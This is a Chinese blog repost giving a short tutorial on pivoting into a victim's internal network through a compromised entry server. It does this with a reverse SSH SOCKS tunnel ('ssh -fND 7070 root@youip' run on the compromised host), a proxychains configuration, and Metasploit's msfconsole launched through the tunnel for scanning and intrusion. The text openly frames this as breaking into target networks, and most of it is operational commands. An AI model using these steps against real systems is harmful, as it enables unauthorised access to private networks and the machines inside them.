proxychains

来源:互联网 发布:php调用mssql存储过程 编辑:程序博客网 时间:2024/05/11 18:17

转载:http://www.52harry.com/program/linux/2011-11-29/651.html

上一篇是要借助外部的工具来实现内网代理,并且有很大的局限性,如果远程主机没开ssh或者做了防火墙规则给过滤掉一般的IP,就不能再用了

这里我们讲一下通过反向代理和本地proxychains来实现内网代理功能,对目标内网进行入侵渗透。不说废话,看图文……
蛋疼了,不发图了,直接写文字,
大的环境作一下介绍,目标主机是内网不可上网的NN台服务器,各种环境,各种操作系统都有,入口鸡是可以上网的服务器,但是不能终端,不能反弹马出来,于是考虑用反向SSH结合本地proxychains来作soks代理,对内网机器进行渗透

本地操作系统为*nix,有外网IP或者映射,开放SSH

于是我们之需要在本地修改一个地方:

编辑 /etc/proxychains.conf

nano /etc/proxychains.conf
要选 dynamic_chain而不是random_chain和strict_chain,即注释掉strict_chain和random_chain那两行。
然后在最后的[ProxyList]下面添加:
socks5 127.0.0.1 7070这样我们在本地的代理端口就是7070,
在远程入口机器上我们执行
ssh -fND 7070 root@youip
然后我们可以在本地使用我们的proxychain启动某些程序对内网的机器进行蛋疼的一些动作了,比如扫描什么的

root@metasploit:/home/exploit# proxychains /pentest/exploits/framework3/msfconsole
ProxyChains-3.1 (http://proxychains.sf.net)
剩下的事情你懂得,我就不多说了,抛了个转头,高手一笑而过就可以了,别吐口水,有玉的就砸过来吧,现金先用卡也可以,可兑换支票和债券也可以的……

http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html

http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php

原创粉丝点击